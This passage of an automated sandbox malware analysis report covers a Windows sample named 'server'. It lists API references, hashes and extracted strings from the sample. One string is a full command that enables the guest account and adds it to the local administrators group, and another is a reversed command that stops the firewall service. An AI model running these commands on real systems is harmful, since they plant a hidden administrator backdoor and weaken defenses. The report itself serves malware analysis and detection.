                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseCreateValuelstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 1356686001-0
                                                                                              • Opcode ID: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
                                                                                              • Instruction ID: 7b49051102f8b3a7e04b5e6a6f77e5ac8f95ad15ac6f50b5fbf7acef8fa67196
                                                                                              • Opcode Fuzzy Hash: 6f469cda0b208e0ca63033edd93a9e46ed06a8d285518f132b144785bc4708a2
                                                                                              • Instruction Fuzzy Hash: 50F0D0753443527FF620CB50CD89F6B77EDEB88B50F108908F685A6190D6B0FD418B66
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000001), ref: 100114BF
                                                                                              • TerminateThread.KERNEL32(?,00000000), ref: 100114D8
                                                                                              • Sleep.KERNEL32(00000001), ref: 100114E0
                                                                                              • TerminateProcess.KERNEL32(?,00000001), ref: 100114E8
                                                                                                • Part of subcall function 10003DB0: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                                                                                • Part of subcall function 10003DB0: CancelIo.KERNEL32(?), ref: 10003DE7
                                                                                                • Part of subcall function 10003DB0: InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                                                                                • Part of subcall function 10003DB0: closesocket.WS2_32(?), ref: 10003E03
                                                                                                • Part of subcall function 10003DB0: SetEvent.KERNEL32(?), ref: 10003E10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: SleepTerminate$CancelEventExchangeInterlockedProcessThreadclosesocketsetsockopt
                                                                                              • String ID:
                                                                                              • API String ID: 3242870944-0
                                                                                              • Opcode ID: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
                                                                                              • Instruction ID: c378b0861d785e21301bdfc87bc3ab075883bb077402934db3b02ae2e10452dd
                                                                                              • Opcode Fuzzy Hash: 8e484390c704dc857f177f1c773443b864ffa47019b696dc8a7e0cee6581ed40
                                                                                              • Instruction Fuzzy Hash: D9F03732200350ABE310EB65CC85F5BB3A5BB88720F004A1DF6959B2D0D7B0E8448B51
                                                                                              APIs
                                                                                              • GetInputState.USER32 ref: 100067F3
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 100067FF
                                                                                              • PostThreadMessageA.USER32(00000000), ref: 10006806
                                                                                              • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10006817
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessageThread$CurrentInputPostState
                                                                                              • String ID:
                                                                                              • API String ID: 2517755969-0
                                                                                              • Opcode ID: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                                                                                              • Instruction ID: be37903158f8ce1355c4e343a4486a1e9724d5febc653840301b138d8f38b73e
                                                                                              • Opcode Fuzzy Hash: f068882617931f03d063f58f9d32d767fe4a38755a4332fb425594b53d04b317
                                                                                              • Instruction Fuzzy Hash: 60D0C77168036077FB107BE48C4FF463A297B04B01F900454F705DA1E1D6F456148B67
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,00000000,00000000,?,10068F9D,?,?,?,?), ref: 10069393
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: FriendlyName
                                                                                              • API String ID: 542301482-3623505368
                                                                                              • Opcode ID: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
                                                                                              • Instruction ID: 258e8a263c28d7347944fa1d558e3935b77094b7b272d9d199a9c21f0b65fa88
                                                                                              • Opcode Fuzzy Hash: 9d1032148119b2da218872289ef4e99e1cb5796a42506ce89b41a72a847b9d01
                                                                                              • Instruction Fuzzy Hash: 26512671204241AFC700DF58C8C4E9AB7EAFBC9724F508A6DF5998B251C735EC86CB62
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(?,00000000), ref: 004049A4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID: $
                                                                                              • API String ID: 1807457897-3032137957
                                                                                              • Opcode ID: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
                                                                                              • Instruction ID: b87dcbb75cd3c471051da0e28ff986719ac4621f1c2140c0425cb5d80edd0c9f
                                                                                              • Opcode Fuzzy Hash: ae83eec624f04b339c206aedc32f167b1e4519e52e6f01105cbc9eef7ef967dd
                                                                                              • Instruction Fuzzy Hash: 774167B12041585EFB12C660DD49BFB3FB89B46700FD400F6D649EA1D2C2794918CBAE
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _ftol
                                                                                              • String ID: *,
                                                                                              • API String ID: 2545261903-327129236
                                                                                              • Opcode ID: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
                                                                                              • Instruction ID: accb0fd77c38b38dac35c35713d96fe46105689da0a5d4e94071b2b8a9246534
                                                                                              • Opcode Fuzzy Hash: f28266acba0517d0ef76b8f63368f88f2e3b972e201cca309f8e098b87e9ab43
                                                                                              • Instruction Fuzzy Hash: 1E11E676B082295BD350CF2AD88069E7BE5EB85BE1F32413AE408D7211D7319C948FD6
                                                                                              APIs
                                                                                              • WinExec.KERNEL32(00000000,00000000), ref: 1000B346
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Exec
                                                                                              • String ID: /del$net user
                                                                                              • API String ID: 459137531-2512890511
                                                                                              • Opcode ID: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
                                                                                              • Instruction ID: 5dd7e995ff607eb42942ab6a2a69a7874cb309585a325c5644f1848542d2a52f
                                                                                              • Opcode Fuzzy Hash: 78dea157b794ebc47affa29f65fdeb0e2daad498c184a7a1bd52b5e36626c8a0
                                                                                              • Instruction Fuzzy Hash: 3B11BE36600A045BD718CA78D89066BB6D2FBC4330F148B3EFA66C32D0EEB59D49C245
                                                                                              APIs
                                                                                              • EnumWindows.USER32(Function_0000C600,00000000), ref: 1000CB8E
                                                                                                • Part of subcall function 10003E30: _ftol.MSVCRT ref: 10003E6F
                                                                                                • Part of subcall function 10003E30: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10003E79
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@EnumWindows_ftol
                                                                                              • String ID: {$|
                                                                                              • API String ID: 1507428005-264143378
                                                                                              • Opcode ID: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
                                                                                              • Instruction ID: b21fffd7c8efe6577bddb62a25c2f06230fca87104460267a0584959008793d5
                                                                                              • Opcode Fuzzy Hash: 3e740fe28869a124bf14874d3fa4f51034db2774c9377083249108f83c0ded99
                                                                                              • Instruction Fuzzy Hash: F301DB32604188DFE714DF68D85ABAEB7D5FB84310F40826EE90A972C1CBB55E05C750
                                                                                              APIs
                                                                                              • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 10006843
                                                                                              • sprintf.MSVCRT ref: 1000688E
                                                                                              Strings
                                                                                              • \Program Files\Internet Explorer\IEXPLORE.EXE, xrefs: 10006849
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DirectorySystemsprintf
                                                                                              • String ID: \Program Files\Internet Explorer\IEXPLORE.EXE
                                                                                              • API String ID: 2264545904-1152295267
                                                                                              • Opcode ID: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
                                                                                              • Instruction ID: 99df4ed59750c9dd993d51c468aa5d343e53be9d723c6599038c39a96e95830f
                                                                                              • Opcode Fuzzy Hash: f076004f84cb907a7609523adf1ec212d4f6e7c5108ce2d61a9f53a1d08a3bc1
                                                                                              • Instruction Fuzzy Hash: 8DF0F6326042042BD3188678DC99BDB7B8AEBC4331F54872EFAA6872C0D9B98908C255
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Exec_strrev
                                                                                              • String ID: sseccaderahs pots ten
                                                                                              • API String ID: 37789026-4286520837
                                                                                              • Opcode ID: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
                                                                                              • Instruction ID: c3e97b05e1a0e89978fc418c8abf29a90b807b51c292c120b08a6d1b6e549f13
                                                                                              • Opcode Fuzzy Hash: b16de7f109e9ee2caeba731d9e336f4db8808fa970a32cde9eb3490c8bfceb06
                                                                                              • Instruction Fuzzy Hash: 2EF0A77650060017D7189639DC556DB7B96ABC5320F44462CF75B872D0D9B98908C281
                                                                                              APIs
                                                                                              Strings
                                                                                              • cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add, xrefs: 1000B394
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Execwsprintf
                                                                                              • String ID: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
                                                                                              • API String ID: 3709078785-529560147
                                                                                              • Opcode ID: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
                                                                                              • Instruction ID: 0a7898c6996eab9a84bb7628cc6b94f02dfbc87351f9717496f3ad2297c58d40
                                                                                              • Opcode Fuzzy Hash: 3eb5af844a6475c9db260c789b29842549fd0aeca9e9fd6efd0d275bca71aca5
                                                                                              • Instruction Fuzzy Hash: 0FF0E5B56043007BF310C768DC44B8BB6A5ABD4704F00C939FB84D22A0EAF9D958C55A
                                                                                              APIs
                                                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402245
                                                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402279
                                                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 00402293
                                                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00401FE5,?,?,?,00000100,?,00000000), ref: 004022AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2612467776.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2605808787.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2617496630.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2623270724.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2628429149.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2634431094.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocHeap$FreeVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 3499195154-0
                                                                                              • Opcode ID: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
                                                                                              • Instruction ID: 68bd45274bd7996747cb266cb4e28ae1d64785b643fce2e0ad39ffcb9bf25311
                                                                                              • Opcode Fuzzy Hash: 71ee379a2087e103e6e659a8a3a3a0c42074fd8c15ad1c352f7fb21626a1355d
                                                                                              • Instruction Fuzzy Hash: 4D111C30200201AFD7319F58ED49E237BB5FBA47147A00639E556D61F1C7F0695ACB18
                                                                                              APIs
                                                                                              • lstrlen.KERNEL32(?,?,?,?,100071F6,?,?,?,L$_RasDefaultCredentials#0), ref: 1000716E
                                                                                              • malloc.MSVCRT ref: 10007186
                                                                                              • lstrlen.KERNEL32(?,00000000,4C8D0824,L$_RasDefaultCredentials#0,?,?,?,?,?,?,?,?,10007451,?), ref: 1000719B
                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,10007451,?), ref: 100071A3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2705809643.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                              • Associated: 00000003.00000002.2705730501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705868237.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705894321.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.2705981451.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: lstrlen$ByteCharMultiWidemalloc
                                                                                              • String ID:
                                                                                              • API String ID: 3822420913-0
                                                                                              • Opcode ID: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                                                                                              • Instruction ID: a4b6d9cd29bce437580047181b5565ca307375c70172c03540230846982f558e
                                                                                              • Opcode Fuzzy Hash: 01a0e458b23e03b1e3e11f9f1416ba6d64d9ea9cf4cd948bdac998653c033b1e
                                                                                              • Instruction Fuzzy Hash: F7F0A7B21403526BF2209B54CC8AE7BB3BCEF89721F00442DF585C7240D668A805C372

                                                                                              Execution Graph

                                                                                              Execution Coverage:25.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21.5%
                                                                                              Total number of Nodes:618
                                                                                              Total number of Limit Nodes:11
                                                                                              execution_graph 1733 405244 LoadLibraryA GetProcAddress FindResourceA 1734 405284 LoadResource 1733->1734 1735 40532c 1733->1735 1734->1735 1737 40529f 1734->1737 1737->1735 1738 4052a8 LockResource 1737->1738 1738->1735 1739 4052b5 wsprintfA CreateFileA 1738->1739 1739->1735 1740 4052ed WriteFile SetFilePointer lstrlen WriteFile CloseHandle 1739->1740 1740->1735 1741 4027e4 1743 4027ed 1741->1743 1742 402967 realloc 1744 40281c 1742->1744 1743->1742 1743->1744 1304 406a48 __set_app_type __p__fmode __p__commode 1305 406ab7 1304->1305 1306 406acb 1305->1306 1307 406abf __setusermatherr 1305->1307 1316 406bb2 _controlfp 1306->1316 1307->1306 1309 406ad0 _initterm __getmainargs _initterm 1310 406b24 GetStartupInfoA 1309->1310 1312 406b58 GetModuleHandleA 1310->1312 1317 40597d WSAStartup 1312->1317 1316->1309 1327 4059f4 LoadLibraryA GetProcAddress _mbscpy _mbscat RegOpenKeyExA 1317->1327 1320 4059a1 StartServiceCtrlDispatcherA 1322 4059c1 exit _XcptFilter 1320->1322 1321 4059c7 1329 405b10 28 API calls 1321->1329 1328 40599d 1327->1328 1328->1320 1328->1321 1330 405c64 1329->1330 1344 405d26 1329->1344 1357 406bd0 LoadLibraryA GetProcAddress 1330->1357 1332 405c6b 1333 406bd0 2 API calls 1332->1333 1335 405c79 1333->1335 1334 406033 1359 40604d 1334->1359 1337 406bd0 2 API calls 1335->1337 1339 405c84 1337->1339 1340 406bd0 2 API calls 1339->1340 1341 405c8f 1340->1341 1342 406bd0 2 API calls 1341->1342 1343 405c9a 1342->1343 1345 406bd0 2 API calls 1343->1345 1344->1334 1348 405e3e GetLastError 1344->1348 1350 405e4b 1344->1350 1346 405ca5 wsprintfA _mbscat _mbscat 1345->1346 1347 405cf7 memset _mbscpy 1346->1347 1347->1344 1348->1350 1349 405e8c _mbscpy _mbscat 1351 405fbe lstrlen 1349->1351 1350->1334 1350->1349 1351->1334 1352 40355b LoadLibraryA GetProcAddress GetModuleFileNameA GetShortPathNameA GetEnvironmentVariableA 1353 403610 ShellExecuteEx 1352->1353 1355 4036bf ExitProcess 1353->1355 1356 40367f 6 API calls 1353->1356 1356->1355 1358 406bea 1357->1358 1358->1332 1360 406055 1359->1360 1361 40355b 12 API calls 1360->1361 1362 4059db 1361->1362 1362->1322 1362->1352 1745 4067e9 1748 406719 1745->1748 1746 40692b ??3@YAXPAX 1746->1748 1747 406926 1748->1746 1749 406953 free 1748->1749 1750 406723 strcmp 1748->1750 1751 40680c 1748->1751 1752 406974 1749->1752 1753 406969 GetTickCount 1749->1753 1750->1748 1754 406741 GetIfTable 1750->1754 1751->1747 1755 4068f1 sprintf _mbscpy 1751->1755 1756 4068b1 sprintf _mbscpy 1751->1756 1753->1752 1754->1748 1757 406787 ??2@YAPAXI 1754->1757 1755->1747 1756->1747 1757->1748 1758 4067b5 GetIfTable 1757->1758 1758->1746 1758->1748 1759 40588b LoadLibraryA GetProcAddress 1760 4058b3 1759->1760 1765 4058bd 1759->1765 1761 4058ba 1760->1761 1762 40593f Sleep 1760->1762 1764 405904 Sleep 1761->1764 1761->1765 1766 4058f5 1762->1766 1763 4058dd Sleep 1763->1766 1764->1766 1765->1763 1765->1766 1769 407470 6 API calls 1872 407440 1769->1872 1771 40756d socket 1840 407512 1771->1840 1772 406c10 4 API calls 1772->1840 1773 4078e2 RtlExitUserThread LoadLibraryA GetProcAddress 1774 407a2b 1773->1774 1775 40796f 1773->1775 1777 406bd0 2 API calls 1774->1777 1877 406c50 6 API calls 1775->1877 1779 407a31 1777->1779 1780 407a38 wsprintfA 1779->1780 1783 406bd0 2 API calls 1779->1783 1792 407a8a 1780->1792 1781 4079df 1785 407a23 RtlExitUserThread 1781->1785 1786 4079e7 CreateProcessA 1781->1786 1783->1780 1784 40761b inet_addr 1784->1840 1785->1774 1787 407a1d Sleep 1786->1787 1788 407a0d Sleep TerminateProcess 1786->1788 1787->1781 1788->1787 1789 407ae2 RtlExitUserThread LoadLibraryA GetProcAddress 1791 406c50 6 API calls 1789->1791 1790 406c10 4 API calls 1790->1792 1793 407b68 wsprintfA 1791->1793 1792->1789 1792->1790 1879 408680 socket 1792->1879 1794 407bf7 CreateProcessA 1793->1794 1802 407bc9 1793->1802 1796 407c21 Sleep TerminateProcess 1794->1796 1797 407c39 1794->1797 1796->1797 1799 406bd0 2 API calls 1797->1799 1798 407aad send 1803 407ad7 Sleep 1798->1803 1800 407c3f 1799->1800 1804 407c9b 1800->1804 1805 407c4d 1800->1805 1801 407d78 RtlExitUserThread LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 1807 406c10 4 API calls 1801->1807 1802->1801 1806 406c10 4 API calls 1802->1806 1813 408680 4 API calls 1802->1813 1803->1792 1810 407ca2 1804->1810 1811 407cdd 1804->1811 1808 407c52 wsprintfA 1805->1808 1809 407c76 wsprintfA 1805->1809 1806->1802 1838 407e08 1807->1838 1808->1802 1809->1802 1814 406bd0 2 API calls 1810->1814 1812 406bd0 2 API calls 1811->1812 1815 407ce2 1812->1815 1816 407d48 send 1813->1816 1817 407ca7 1814->1817 1818 406bd0 2 API calls 1815->1818 1822 407d6e Sleep 1816->1822 1820 406bd0 2 API calls 1817->1820 1821 407cf0 wsprintfA 1818->1821 1819 407e24 socket 1819->1838 1823 407cb5 wsprintfA 1820->1823 1821->1802 1822->1802 1823->1802 1824 407ecb RtlExitUserThread LoadLibraryA GetProcAddress 1825 407f3e 1824->1825 1826 407f7f 1824->1826 1827 406bd0 2 API calls 1825->1827 1828 406bd0 2 API calls 1826->1828 1829 407f4a 1827->1829 1830 407f8c 1828->1830 1832 406bd0 2 API calls 1829->1832 1833 406bd0 2 API calls 1830->1833 1831 406bd0 LoadLibraryA GetProcAddress 1831->1838 1834 407f58 wsprintfA 1832->1834 1835 407f9a wsprintfA 